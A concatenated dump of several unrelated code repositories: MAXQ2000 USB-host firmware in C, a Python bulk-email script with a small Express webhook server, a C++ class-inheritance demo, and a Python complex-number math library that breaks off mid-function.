while( !(FLAG & bmFRAMEIRQ) && !(FLAG & bmCONNIRQ) );
FRAMECOUNT++;
// FLAG = 0;
}
FRAMECOUNT = 0;
wreg(rHIEN,temp);
}
// Host
// PURPOSE: PAuse for an expected Host IRQ to occur. This pause can be interrupted by a change in
// device connect status.
// PRECONDITIONS: Host mode, SPI configured.
// POSTCONDITIONS: Interrupts are returned to original state.
// ARGUMENTS: BYTE representing the HIRQ bit mask for the expected Host interrupt
// RETURNS: BYTE HSRLT
BYTE Wait_for_HIRQ(BYTE regbit)
{
static BYTE result, temp1, temp2;
temp1 = regbit;
temp2 = rreg(rHIEN);
wreg(rHIEN,temp1 | (BYTE)bmCONNIRQ); // enable only one IRQ in the HIEN register
while( !(FLAG & temp1) && !(FLAG & bmCONNIRQ) ); // hang until an irq
result = (rreg(rHRSL) & 0x0F); // get the completion code
// FLAG = 0;
wreg(rHIEN,temp2); // restore ints
return result;
}
// Host
// PURPOSE: This ISR services the Host interrupts triggered in the HIRQ register.
// PRECONDITIONS: Host mode, SPI configured, interrupts enabled.
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
#pragma vector = 1 // MAXQ2000 Module 1 Vector
__interrupt void interrupt_service_routine()
{
// Has MAXQ2000 INT12 line been triggered?
if ( EIF1_bit.IE12 ) // IE12 EIF1.4
{
// Does a valid enabled host interrupt exist?
if( INTERRUPT = (rreg( rHIRQ ) & rreg( rHIEN )) )
{
// Which host interrupt?
// CONNECT IRQ: USB State of Connection Changed
if ( INTERRUPT & bmCONNIRQ )
{
FLAG = bmCONNIRQ;
wreg(rHCTL,0x04); // Sample the USB bus
// Set the NEXT connection state.
switch ( rreg(rHRSL) & 0xC0 )
{
case 0x00 : // SE0 - EOP or disconnect
NEXT = 0x00;
break;
case bmKSTATUS : // K STATE
NEXT = bmKSTATUS;
break;
case bmJSTATUS : // J STATE
NEXT = bmJSTATUS;
break;
default : // error
NEXT = 3;
break;
}
wreg( rHIRQ, bmCONNIRQ ); // clear this irq
}
// HXFRDN IRQ: Host Transfer Done
else if ( INTERRUPT & bmHXFRDNIRQ )
{
FLAG = bmHXFRDNIRQ;
wreg( rHIRQ, bmHXFRDNIRQ ); // clear this irq
}
// BUSEVENT IRQ: [Bus Reset + 50mSec] <or> [Bus Resume + 20mSec]
else if ( INTERRUPT & bmBUSEVENTIRQ )
{
FLAG = bmBUSEVENTIRQ;
wreg( rHIRQ, bmBUSEVENTIRQ); // clear this irq
}
// RSMREQDET IRQ: Bus Resume Request Detected
else if ( INTERRUPT & bmRSMREQDETIRQ )
{
FLAG = bmRSMREQDETIRQ;
wreg( rHIRQ, bmRSMREQDETIRQ ); // clear this irq
}
// RCVDAV IRQ: Receiver FIFO Contains Data
else if ( INTERRUPT & bmRCVDAVIRQ )
{
FLAG = bmRCVDAVIRQ;
wreg( rHIRQ, bmRCVDAVIRQ ); // clear this irq
}
// SNDBAV IRQ: Send Buffer Available
else if ( INTERRUPT & bmSNDBAVIRQ )
{
FLAG = bmSNDBAVIRQ;
wreg( rHIRQ, bmSNDBAVIRQ ); // clear this irq
}
// SUSPENDDN IRQ: Suspend Generation Done
else if ( INTERRUPT & bmSUSPENDDNIRQ )
{
FLAG = bmSUSPENDDNIRQ;
wreg( rHIRQ, bmSUSPENDDNIRQ ); // clear this irq
}
// FRAME IRQ: SOF Packet Begin
else if ( INTERRUPT & bmFRAMEIRQ )
{
FLAG = bmFRAMEIRQ;
wreg( rHIRQ, bmFRAMEIRQ ); // clear the IRQ
}
} // end if(INTERRUPT)
else
{
// No Valid Enabled Interrupt
FLAG = -1;
// Clear MAXQ2000 INT12 Interrupt
EIF1_bit.IE12 = 0;
return;
}
// Clear MAXQ2000 INT12 Interrupt
EIF1_bit.IE12 = 0;
} // end if( EIF1_bit.IE12 )
} // end ISR
//#endif // HOST
#endif
<file_sep>/My Code/simple_test2/simple_test2.c
//
// File........: simple_test.c
// Authors.....:
// Description.:
//
//
// Conditions:
// IFACE: SPI
//
// Date........:
//
// The proper interface can be found in interface.c
#ifndef simple_test_C
#define simple_test_C
// Interrupt or not? - define only one.
//#define INT_DRIVEN
//#define POLLED
// Host or peripheral? - define only one.
#define HST
//#define PER
// Which interface? - define only one.
#define IFACE_SPI
//#define IFACE_I2C
//#include <stdio.h>
//#include <stdlib.h>
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // MAXQ2000 specific stuff
#include "RT53reg.h" // RT99 Registers and bits
#include "..\interface.c" // SPI/I2C Implementation
//#include "..\usb.c" // USB Implementation
///// Declare GLOBALS Here ///////////////////////
int FLAG;
BYTE INTERRUPT;
int FRAMECOUNT;
BYTE errorcode;
int NEXT;
BYTE SUD[8]; // my copy of setup data
// prototypes in this module
void waitframes(int num);
BYTE Wait_for_HIRQ(BYTE regbit);
void Read_Keypad(void);
void prep_keypad(void);
//********************
///////////////////////////////////////////////////
main()
{
///// Declare Variables Here ///////////////////////
// static BYTE Set_Addr4[8] = {0x00,0x05,0x04,0x00,0x00,0x00,0x00,0x00};
// static BYTE Set_Config1[8] = {0x00,0x09,0x01,0x00,0x00,0x00,0x00,0x00};
// static BYTE Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
// static BYTE HR1,HR2,HR3;
static BYTE dum, result;
///////////////////////////////////////////////////
// MAXQ2000 SPI port as a master
SPI_Init();
// MUST GO BEFORE AMY SPI TRAFFIC
// RT53: INTLEVEL=0, POSINT=1 for pos edge interrupt pin
wreg(rPINCTL,(bmFDUPSPI|bmPOSINT));
// disable interrupt pin
// wreg(rCPUCTL, 0x00);
// disable all interrupt
wreg(rUSBIEN,0x00);
wreg(rGPINIEN,0x00);
wreg( rHIEN, 0x00 );
wreg(rCPUCTL, 0x00);
// chip reset
// Reset_MAX(1000); // RT53: Reset USB bus [SPI port must be set up before this will work]
wreg(rUSBCTL,0x20);
timeDELAY(500); // a delay
wreg(rUSBCTL,0x00); // remove the reset
timeDELAY(2000); // a delay
// Set up the host
wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmLOWSPEED|bmHOST)); // low speed
//wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmHOST)); // full speed
// LED RELATED MAXQ2000
PD0=0xFF; // MAXQ: Set port 0 to outputs
PO0 = rreg(rRevision); // MAXQ:
PD7 = 0x01; // MAXQ: P70 is scope TRIG signal
// INTERRUPT RELATED MAXQ2000
// MAX3410E INT pin is tied to MAXQ2000 P60: make it an input
PD6 &= ~0x01; // MAXQ: PD6.0=0 (turn off output)
EIES1_bit.IT12 = 0; // MAXQ: 0=pos edge triggered IRQ
EIE1_bit.EX12 = 1; // MAXQ: Enable Int12
IMR |= 0x02; // MAXQ: enable interrupts for module 1
// Enable interrupt pin
wreg(rCPUCTL, 0x0F);
wreg(rHIRQ, 0xFF); // Clear Pending INTs
// MAXQ: enable interrupts
__enable_interrupt();
///// Your Code Here //////////////////////////////
dum = Wait_for_HIRQ(bmFRAMEIRQ);
while(1);
/////////////////////////////////////////////////////
} // End of main(void)
// Purpose: To remain in a loop until the FRAMEIRQ decrements a global variable to zero.
void waitframes(int num)
{
FRAMECOUNT = 0;
while(FRAMECOUNT <= num)
{
wreg(rHIEN,bmFRAMEIE);
while( FLAG != bmFRAMEIRQ );
FRAMECOUNT++;
FLAG = 0;
}
FRAMECOUNT = 0;
}
BYTE Wait_for_HIRQ(BYTE regbit)
{
static BYTE result;
wreg(rHIEN,regbit); // enable only one IRQ in the HIEN register
while( FLAG != regbit ); // hang until an irq
result = (rreg(rHRSL) & 0x0F); // get the completion code
FLAG = 0;
wreg(rHIEN,0x00); // all ints off
return result;
}
#pragma vector = 1 // Module 1 Vector
__interrupt void interrupt_service_routine()
{
// static BYTE fred;
// while(1) // Stay in loop while a valid interrupt exists
// {
// Has INT12 been triggered?
if ( EIF1_bit.IE12 ) // IE12 EIF1.4
{
// Loop while a valid interrupts exists
if( INTERRUPT = (rreg( rHIRQ ) & rreg( rHIEN )) )
// if( (INTERRUPT = (rreg( rHIRQ ) )) != 0x00 )
{
// Check which host interrupt
if ( INTERRUPT & bmCONNIRQ ) // State of Connection Changed
{
FLAG = bmCONNIRQ;
switch ( rreg(rHRSL) & 0xC0 )
{
case 0x00 : // SE0 - EOP or disconnect
NEXT = 0;
break;
case bmKSTATUS : // K STATE
NEXT = 1;
break;
case bmJSTATUS : // J STATE
NEXT = 2;
break;
default : // error
NEXT = 3;
break;
}
wreg( rHIRQ, bmCONNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmHXFRDNIRQ ) // Host Transfer Done
{
FLAG = bmHXFRDNIRQ;
wreg( rHIRQ, bmHXFRDNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmBUSEVENTIRQ ) // [bus reset + 50mSec] or [bus resume + 20mSec]
{
FLAG = bmBUSEVENTIRQ;
wreg( rHIRQ, bmBUSEVENTIRQ); // clear this irq
}
else if ( INTERRUPT & bmRSMREQDETIRQ ) // Bus Resume Request Detected
{
FLAG = bmRSMREQDETIRQ;
wreg( rHIRQ, bmRSMREQDETIRQ ); // clear this irq
}
else if ( INTERRUPT & bmRCVDAVIRQ ) // Receiver FIFO contains Data
{
FLAG = bmRCVDAVIRQ;
wreg( rHIRQ, bmRCVDAVIRQ ); // clear this irq
}
else if ( INTERRUPT & bmSUSPENDDNIRQ ) // Suspend generation Done
{
FLAG = bmSUSPENDDNIRQ;
wreg( rHIRQ, bmSUSPENDDNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmSNDBAVIRQ ) // Send Buffer Available
{
FLAG = bmSNDBAVIRQ;
wreg( rHIRQ, bmSNDBAVIRQ ); // clear this irq
}
else if ( INTERRUPT & bmFRAMEIRQ ) // begin SOF Packet
{
FLAG = bmFRAMEIRQ;
wreg( rHIRQ, bmFRAMEIRQ ); // clear the IRQ
}
} // end if(INTERRUPT)
else
{
FLAG = -1;
EIF1_bit.IE12 = 0;
return;
}
} // end if( EIF1_bit.IE12 )
// } //end while(1)
} // end ISR
#endif
<file_sep>/My Code/interface.h
// interface.h
// SPI specific to the MAXQ board prototypes
//
//
#ifndef INTERFACE_H
#define INTERFACE_H
void update_lites(void);
// SPI Specific Prototypes
void SPI_Init(void);
__monitor WORD sendBYTE( WORD );
__monitor WORD rreg( WORD );
__monitor void wreg( WORD, BYTE );
//void wreg(BYTE r,BYTE v);
//BYTE rreg(BYTE r);
BYTE rreg_bb(BYTE reg);
void wreg_bb(BYTE r,BYTE v);
__monitor void readbytes(BYTE reg, BYTE N, BYTE *p);
__monitor void ReadBytes(BYTE reg, BYTE N, BYTE *p);
__monitor void writebytes(BYTE reg, BYTE N, BYTE *p);
__monitor void WriteBytes(BYTE reg, BYTE N, const BYTE *p);
void wregAS(BYTE r,BYTE v);
BYTE rregAS(BYTE r);
BYTE rreg16(BYTE reg);
void wreg16(BYTE reg,BYTE dat);
#endif
<file_sep>/My Code/hst_LS_KBD_NOHUB/hst_LS_KBD_NOHUB.c
//
// File........: hst_LS_KBD_NOHUB.c
// Authors.....:
// Description.:
//
//
// Conditions:
// IFACE: SPI
//
// Date........:
//
// The proper interface can be found in interface.c
#ifndef PER_LS_KBD_NOHUB_C
#define PER_LS_KBD_NOHUB_C
// Interrupt or not? - define only one.
//#define INT_DRIVEN
//#define POLLED
// Host or peripheral? - define only one.
#define HST
//#define PER
// Which interface? - define only one.
#define IFACE_SPI
//#define IFACE_I2C
//#include <stdio.h>
//#include <stdlib.h>
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // MAXQ2000 specific stuff
#include "RT53reg.h" // RT99 Registers and bits
#include "..\interface.c" // SPI/I2C Implementation
#include "..\usb.c" // USB Implementation
// prototypes in this module
void Read_Keypad(void);
void prep_keypad(void);
//********************
///// Declare GLOBALS Here ///////////////////////
BYTE SUD[8]; // my copy of setup data
///////////////////////////////////////////////////
main()
{
///// Declare Variables Here ///////////////////////
BYTE Set_Addr4[8] = {0x00,0x05,0x04,0x00,0x00,0x00,0x00,0x00};
BYTE Set_Config1[8] = {0x00,0x09,0x01,0x00,0x00,0x00,0x00,0x00};
BYTE Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
BYTE HR1,HR2,HR3;
BYTE dum;
///////////////////////////////////////////////////
SPI_Init(); // set up MAXQ2000 to use its SPI port as a master
wreg(rPINCTL,(bmFDUPSPI|bmPOSINT));//|bmINTLEVEL)); // RT53: INTLEVEL=0, POSINT=1 for pos edge interrupt pin
// chip reset
// Reset_MAX(1000); // RT53: Reset USB bus [SPI port must be set up before this will work]
wreg(rUSBCTL,0x20);
timeDELAY(500); // a delay
wreg(rUSBCTL,0x00); // remove the reset
timeDELAY(2000); // a delay
// Set up the host
wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmLOWSPEED|bmHOST)); // low speed
//wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmHOST)); // full speed
// LED RELATED MAXQ2000
PD0=0xFF; // MAXQ: Set port 0 to outputs
PO0 = rreg(rRevision); // MAXQ:
PD7 = 0x01; // MAXQ: P70 is scope TRIG signal
// INTERRUPT RELATED MAXQ2000
// // MAX3410E INT pin is tied to MAXQ2000 P60: make it an input
PD6 &= ~0x01; // MAXQ: PD6.0=0 (turn off output)
EIES1_bit.IT12 = 0; // MAXQ: 0=pos edge triggered IRQ
EIE1_bit.EX12 = 1; // MAXQ: Enable Int12
IMR |= 0x02; // MAXQ: enable interrupts for module 1
// wreg(rUSBIEN,0x00);
// wreg(rGPINIEN,0x00);
wreg( rHIEN, 0x00 ); // disable all interrupt
wreg(rCPUCTL, bmIE); // Enable interrupt pin (for scope observation)
__enable_interrupt();
///// Your Code Here //////////////////////////////
// Reset the USB device
wreg(rHIEN, bmBUSEVENTIE); // enable the reset done irq
wreg(rHCTL,bmBUSRST); // initiate the 50 msec bus reset
Wait_for_HIRQ(bmBUSEVENTIRQ); // wait for and clear this interrupt
//
waitframes(4);
// Set_Address to 4
wreg(rPERADDR,0x00); // send to address 0
writebytes(rSUDFIFO,8,Set_Addr4); // Load the SUDFIFO with Set_Address=4 request
HR1 = CTL_WRITE(); // this function returns only after completion
// Set_Config to 1
wreg(rPERADDR,0x04); // address is now 4
writebytes(rSUDFIFO,8,Set_Config1); // Load the SUDFIFO with Set_Config=1 request
HR2 = CTL_WRITE();
// Send the "set_idle" request
writebytes(rSUDFIFO,8,Set_Idle); // Load the SUDFIFO with Set_Idle request
HR3 = CTL_WRITE();
//
Read_Keypad();
dum = rreg(rHRSL);
dum >>= 6;
dum &=0x03;
wreg(rIOPINS2,dum); // show bus state
//
while(1);
}
//
// functions local to this module
//
// FUNCTION: Read_Keypad
// Send IN tokens to EP1, once every 10 frames.
// If NAK handshake, do nothing. If ACK, read the 8 keyboard data bytes in RCVFIFO, and
// write the keycode to the MAXQ2000 LED bar.
//
void Read_Keypad(void) // constantly read the keypad, return if the connect
{ // state changes
BYTE HR,rxnum,KB_data[8],newkey;
wreg(rHIRQ,bmCONNIRQ); // clear any remnants
wreg(rHCTL,bmRCVTOG0); // very first data toggle should be DATA0
while(1)
{
waitframes(10);
if(rreg(rHIRQ) & bmCONNIRQ) // check for connect-status change
{
wreg(rHIRQ,bmCONNIRQ); // clear the IRQ
return;
}
wreg(rHXFR,0x01); // send an IN token to EP1 (OUTNIN=0)
HR = Wait_for_HIRQ(bmHXFRDNIRQ); // this also clears the IRQ bit
switch(HR)
{
case hrNAK: L8_ON
break; // do nothing
case hrSUCCESS: // get the KB packet
rxnum = rreg(rRCVBC);
TRIG_HI // scope pulse brackets the 8-byte read
readbytes(rRCVFIFO,rxnum,KB_data); // read "rxnum" bytes from the RCVFIFO
// wreg(rHIRQ,bmRCVDAVIRQ); // re-arm the endpont and SWITCH THE BUFFERS
TRIG_LO
newkey = KB_data[2]; // keycode is in the third byte
if(newkey == 0) // turn off the LEDS when keys are up
PO0=0; // (comment out this test to latch keys in LEDS)
else if (newkey >= 0x59 && newkey <= 0x62) // 89 is 1-key, 98 is 0-key
PO0 = newkey - 0x58; // show it in the LEDS (0 shows as 0x0A)
break;
default: // any other completion code is an error
PO0=0xFF; // all bar LEDS on
while(1); // hang here and examine error code
} // switch(HR)
} // while(1)
////////////////////////////////////////////////////
} // End of main(void)
#endif
| 6f64b29e25ba87ab945368476b2eb12724390a74 | [
"C",
"INI"
] | 10 | C | JopperTom/MaxUSB | 25265c3537b05bafcf053443b164726db71b3b12 | 8afeba28fbc60de0f1ce2b3049f9a7117d7d05b1 |
refs/heads/master | <repo_name>avibanerjee/EmailAutomation<file_sep>/script/send_emails.py
# MY_ADDRESS =
# PASSWORD =
# def get_contacts(names, emails):
# # import name, email
# with open(names, 'r') as artist_names:
# with open (emails, 'r') as contact_emails:
# names = []
# emails = []
# for name in artist_names:
# #uppercase name
# uppercase_name = ''
# caps = name.split()
# for i, term in enumerate(caps):
# if i == len(caps) - 1:
# uppercase_name += term[0].upper() + term[1:]
# else:
# uppercase_name += term[0].upper() + term[1:] + ' '
# names.append(uppercase_name.replace('\n', ''))
# for contact in contact_emails:
# emails.append(contact.strip('\n'))
# return names, emails
# from string import Template
# def read_template(filename):
# with open(filename, 'r', encoding='utf-8') as template_file:
# template_file_content = template_file.read()
# return Template(template_file_content)
# names, emails = get_contacts('mycontacts1.txt', 'mycontacts2.txt')
# for i in range(len(names)):
# print(i+2, names[i], emails[i])
# #SETUP SMTP SERVER
# import smtplib
# s = smtplib.SMTP(host='smtp.gmail.com', port=587)
# s.starttls()
# s.login(MY_ADDRESS, PASSWORD)
# #SEND EMAILS
# from email.mime.multipart import MIMEMultipart
# from email.mime.text import MIMEText
# print(emails[53:])
# TODO: remove test name and email
# names = ['<NAME>', '<NAME>']
# emails = [['<EMAIL>', '<EMAIL>'], ['<EMAIL>', '<EMAIL>']]
# message_template = read_template('message.txt')
# for name, email in zip(names[53:], emails[53:]):
# print(name, email)
# msg = MIMEMultipart() # create a message
# # add in the actual person name to the message template
# message = message_template.substitute(ARTIST_NAME=name.title())
# # setup the parameters of the message
# msg['From']= '<NAME>'
# msg['To']=",".join(email)
# msg['Subject']= name + " Test Tracked Emails"
# # add in the message body
# msg.attach(MIMEText(message, 'plain'))
# msg = msg.as_string()
# # send the message via the server set up earlier.
# #s.sendmail(MY_ADDRESS, email, msg)
# del msg
<file_sep>/server/server.js
const WebHooks = require('node-webhooks');
const hook = new WebHooks({
db: './webHookdDB.json',
httpSuccessCodes: [200, 201, 202, 203, 204],
});
const emitter = hook.getEmitter();
emitter.on('*.success', function(shortname, statusCode, body) {
console.log('Success on trigger webHook' + shortname + 'with status code', statusCode, 'and body', body);
});
emitter.on('*.failure', function(shortname, statusCode, body) {
console.error('Error on trigger webHook' + shortname + 'with status code', statusCode, 'and body', body);
});
const express = require('express');
const app = express();
const port = process.env.PORT || 8080;
app.listen(port, () => console.log(`Server up and running on port ${port} !`));
app.get('/', (req, res) => {
res.send(201);
console.log('webhook hit');
});
<file_sep>/server/package.json
{
"name": "email-auto",
"version": "1.0.0",
"description": "web server for email tracking",
"main": "server.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1",
"start": "node server.js",
"lint": "prettier --write '**/*' --single-quote && eslint .",
"lint-fix": "eslint . --fix"
},
"dependencies": {
"eslint-config-bliss": "^3.3.0",
"express": "^4.16.4"
},
"eslintConfig": {
"extends": [
"airbnb",
"bliss"
],
"rules": {
"semi": [
"error",
"always"
]
}
},
"author": "<NAME>",
"license": "ISC",
"devDependencies": {
"babel-plugin-transform-class-properties": "^6.24.1",
"eslint": "^5.15.3",
"eslint-config-airbnb": "^17.1.0",
"eslint-config-airbnb-base": "^13.1.0",
"eslint-config-google": "^0.12.0",
"eslint-config-react-app": "^3.0.8",
"eslint-plugin-flowtype": "^3.4.2",
"eslint-plugin-flowtype-errors": "^4.0.0",
"eslint-plugin-import": "^2.16.0",
"eslint-plugin-jsx-a11y": "^6.2.1",
"eslint-plugin-react": "^7.12.4",
"prettier": "^1.16.4"
}
}
<file_sep>/script/csv_contacts.py
MY_ADDRESS =
PASSWORD =
def get_contacts(names, emails):
# import name, email
with open(names, 'r') as artist_names:
with open (emails, 'r') as contact_emails:
names = []
emails = []
for name in artist_names:
#uppercase name
uppercase_name = ''
caps = name.split()
for i, term in enumerate(caps):
if i == len(caps) - 1:
uppercase_name += term[0].upper() + term[1:]
else:
uppercase_name += term[0].upper() + term[1:] + ' '
names.append(uppercase_name.replace('\n', ''))
for contact in contact_emails:
asset = contact.replace(' ', '')
asset = asset.strip('\n')
emails.append(asset.split(','))
# for i in range(len(emails)):
# print(names[i], emails[i])
return names, emails
def read_template(filename):
with open(filename, 'r', encoding='utf-8') as template_file:
template_file_content = template_file.read()
return Template(template_file_content)
names, emails = get_contacts('chella_2_names.txt', 'chella_2_emails.txt')
#SETUP SMTP SERVER
import smtplib
s = smtplib.SMTP(host='smtp.gmail.com', port=587)
s.starttls()
s.login(MY_ADDRESS, PASSWORD)
#SEND EMAILS
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from string import Template
#TODO: remove test name and email
#print(emails)
#names = ['<NAME>', '<NAME>']
#emails = [['<EMAIL>', '<EMAIL>'], ['<EMAIL>', '<EMAIL>', '<EMAIL>']]
message_template = read_template('message1.txt')
for name, email in zip(names[45:], emails[45:]):
print(name, email)
msg = MIMEMultipart() # create a message
fromaddr = MY_ADDRESS
toaddr = email[0]
bcc = email[1:] if len(email) > 1 else []
message_subject = "Coachella 2019: " + name + ' photographer'
# add in the actual person name to the message template
message = "From: %s\r\n" % fromaddr + "To: %s\r\n" % toaddr + "Subject: %s\r\n" % message_subject + "\r\n" + message_template.substitute(ARTIST_NAME=name.title())
# setup the parameters of the message
#AVI
#msg['From']= '<NAME>'
#sina
msg['From']= '<NAME>'
msg['To']=email[0]
#Avi
# msg['Subject']= "Coachella 2019: " + name + ' photographer'
msg['Subject']= name + " Coachella 2019 photographer"
toaddrs = [toaddr] + bcc
# add in the message body
msg.attach(MIMEText(message, 'plain'))
msg = msg.as_string()
# send the message via the server set up earlier.
s.sendmail(MY_ADDRESS, toaddrs, message)
del msg
| 5b8a9a80e61cbfde1f0c82ad97f6ddf3b4047b2a | [
"JavaScript",
"JSON",
"Python"
] | 4 | Python | avibanerjee/EmailAutomation | 3ace10d7f28e3ecb12be597c94fb6ad10305af46 | d5a26751d680ecbc5014a409f04ddbc0f7d936ee |
refs/heads/master | <file_sep>#pragma once
#include "Actor.h"
class Actor2 : public Actor
{
public:
Actor2();
~Actor2();
int SumActor2(int x, int y);
void Hello() override;
};
<file_sep>#include "pch.h"
#include "Actor.h"
using namespace std;
Actor::Actor()
{
//cout << "Hello im an Actor\n";
}
Actor::~Actor()
{
}
void Actor::printRef2() const
{
cout << "p_ref2: " << p_ref2 << endl;
}
int Actor::SumNumber(int x, int y)
{
int sum;
sum = x + y;
return sum;
}
void Actor::Hello()
{
cout << "Hello im the first actor!!\n";
}
<file_sep>#include "pch.h"
#include "Actor2.h"
using namespace std;
Actor2::Actor2()
{
//cout << "Hello im an Actor2";
}
Actor2::~Actor2()
{
}
int Actor2::SumActor2(int x, int y)
{
int sum2;
sum2 = x * y;
return sum2;
}
void Actor2::Hello()
{
cout << "Hello im the second actor!\n";
}
<file_sep>
#include "pch.h"
#include "Actor.h"
#include "Actor2.h"
#include <iostream>
using namespace std;
void CallHello(Actor& actor) {
actor.Hello();
}
void CallHello_Bad(Actor actor) {
actor.Hello();
}
int main()
{
Actor actor;
Actor2 actor2;
//actor.printRef2();
//Actor::Actor();
//cout<<actor2.SumActor2(10,30);
CallHello(actor);
CallHello(actor2);
CallHello_Bad(actor);
CallHello_Bad(actor2);
}
<file_sep>#pragma once
#include <iostream>
class Actor
{
public:
Actor();
~Actor();
int ref1 = 10;
virtual void printRef2()const;
virtual int SumNumber(int x, int y);
virtual void Hello();
private:
int p_ref2 = 20;
};
| 06bb8f2939b4e8470c56e1e0d4f0b7b8c5267d5e | [
"C++"
] | 5 | C++ | PR1202/TestClasses | 66fe0cc111f24f99dfcca3613510a35282efe778 | 49c0a151511282a73e46373d6102b78cbd4d3eea |
refs/heads/main | <repo_name>santiforero1018/clasic_to_quantyc<file_sep>/Libreria_numeros_complejos.py
"""Libreria de operaciones basicas con numeros complejos
"""
import math
def tensor_productv(vectorco1, vectorco2):
""" producto tensor entre los vectores
:param vectorco1: vecotr de valores complejos
:param vectorco2: vectotr de valores complejos
:return: producto tensor
"""
lon_tensor = len(vectorco1) * len(vectorco2)
R = [(0, 0)] * lon_tensor
index = 0
for i in range(len(vectorco1)):
for j in range(len(vectorco2)):
R[index] = multiplicacion_complejos(vectorco1[i], vectorco2[j])
index += 1
return R
def hermitiana(matriz):
""" determina si una matriz es hermitiana
:param matriz: una matriz de complejos
:return: un valor booleano
"""
matrizh = adjunta(matriz)
if matrizh == matriz:
return True
else:
return False
def unitaria(matriz):
""" revisa si una matriz es unitaria
:param matriz: matriz de complejos
:return: valor booleano
"""
matrizt = adjunta(matriz)
identidad = [[(0, 0) for i in range(len(matriz[0]))] for j in range(len(matriz))]
for i in range(len(identidad)):
for j in range(len(identidad[0])):
if i == j:
identidad[i][j] = (1, 0)
if multiplicacion_matrices(matrizt, matriz) == identidad:
return True
else:
return False
def distanciav(vectorc1, vectorc2):
if len(vectorc1) == len(vectorc2):
dif1 = []
for i in range(len(vectorc1)):
dif1.append(resta_complejos(vectorc1[i], vectorc2[i]))
productodif = int_product(dif1, dif1)
distancia = modulo_complejos(productodif)
return distancia
def norma_vector(vectorc):
""" realiza la norma de un vector
:param vectorc: vector de complejos
:return: norma del vector
"""
productoint = int_product(vectorc, vectorc)
norma = modulo_complejos(productoint)
return norma
def int_product(vectorc1, vectorc2):
"""producto interno entre dos vectores complejos
:param vectorc1: vector de numeros complejos
:param vectorc2: vector de numeros complejos
:return: porducto interno entre vecotres
"""
if len(vectorc1) == len(vectorc2):
productoint = (0, 0)
vectorc1 = conjugadov(vectorc1)
for i in range(len(vectorc1)):
productoint = suma_complejos(productoint, multiplicacion_complejos(vectorc1[i], vectorc2[i]))
return productoint
else:
return False
def accionmatriz_vector(matrix, vector):
""" accion de una matriz sobre un vector
:param matrix: matriz de complejos
:param vector: vector de complejos
:return: accion de la matriz sobre un vector
"""
if len(matrix[0]) == len(vector):
accion = []
for i in range(len(matrix)):
accion.append((0, 0))
for i in range(len(matrix)):
for j in range(len(vector)):
for k in range(len(matrix[0])):
accion[i] = suma_complejos(accion[i], multiplicacion_complejos(matrix[i][k], vector[j]))
return accion
else:
return False
def multiplicacion_matrices(matrix1, matrix2):
""" multiplicacion entre matrices complejas
:param matrix1: matriz de compliejos
:param matrix2: matriz de complejos
:return: producto entre matrices
"""
if len(matrix1[0]) == len(matrix2):
matrixr = []
for i in range(len(matrix1)):
matrixr.append([])
for j in range(len(matrix2[0])):
matrixr[i].append((0, 0))
for i in range(len(matrix1)):
for j in range(len(matrix2[0])):
for k in range(len(matrix1[0])):
matrixr[i][j] = suma_complejos(matrixr[i][j],
multiplicacion_complejos(matrix1[i][k], matrix2[k][j]))
return matrixr
else:
return False
def adjunta(matriz):
""" adjunta de una matriz
:param matriz: matriz de complejos
:return: adjunta de la matriz
"""
matrizad = conjugadom(transpuesta(matriz))
return matrizad
def conjugadom(matriz):
""" conjugado de una matriz de complejos
:param matriz: matriz de complejos
:return: conjugado de la matriz
"""
for i in range(len(matriz)):
for j in range(len(matriz[0])):
matriz[i][j] = conjugado_complejos(matriz[i][j])
return matriz
def conjugadov(lista):
""" conjugado de un vector de complejos
:param lista: vector de complejos
:return: conjugado vector o matriz de complejos
"""
for i in range(len(lista)):
lista[i] = conjugado_complejos(lista[i])
return lista
def transpuesta(lista):
""" transpuesta de una matriz
:param lista: matriz de complejos
:return: transpuesta de la matriz
"""
transp = []
for i in range(len(lista[0])):
transp.append([])
for j in range(len(lista)):
transp[i].append(lista[j][i])
return transp
def multiescalar_matrix(complexn, matrix):
"""multiplicacion escalar por una matriz
:param complexn: numero complejo
:param matrix: matriz de complejos
:return: multiplicacion escalar
"""
for i in range(len(matrix)):
for j in range(len(matrix[0])):
matrix[i][j] = multiplicacion_complejos(complexn, matrix[i][j])
return matrix
def inversa_add_matrizc(matrizc):
"""inversa aditiva de una matriz compleja
:param matrizc: matriz de numeros complejos
:return: inversa aditiva de la matriz
"""
for i in range(len(matrizc)):
for j in range(len(matrizc[0])):
matrizc[i][j] = multiplicacion_complejos((-1, 0), matrizc[i][j])
return matrizc
def suma_matricesc(matrizc1, matrizc2):
"""suma de dos matricves complejas
:param matrizc1: matriz de numeros complejos
:type matrizc1: list
:param matrizc2: matriz de numeros complejos
:type matrizc2: matriz de numeros complejos
:return: suma de las matrices
:rtype: list
"""
if len(matrizc1) == len(matrizc2) and len(matrizc1[0]) == len(matrizc2[0]):
line = [(0, 0)] * len(matrizc1[0])
matriz_r = [line] * len(matrizc1)
for j in range(len(matrizc1)):
for k in range(len(matrizc1[0])):
matriz_r[j][k] = suma_complejos(matrizc1[j][k], matrizc2[j][k])
return matriz_r
def multi_escalar(complex_num, complex_v):
""" multiplicacion por un escalar
:param complex_num: un numero complejo
:typecomplex_num: tuple
:param complex_v: vector complejo
:type complex_v: list
:return: vector resultante
:rtype list
"""
r_vector = [(0, 0)] * len(complex_v)
for x in range(len(complex_v)):
r_vector[x] = multiplicacion_complejos(complex_num, complex_v[x])
return r_vector
def inverse_vectorcx(vectorc):
""" inverso aditivo de un vector complejo
:param vectorc: vector de numeros complejos
:return: inverso aditivo del vector ingresado
:rtype: list
"""
inverse_v = [(0, 0)] * len(vectorc)
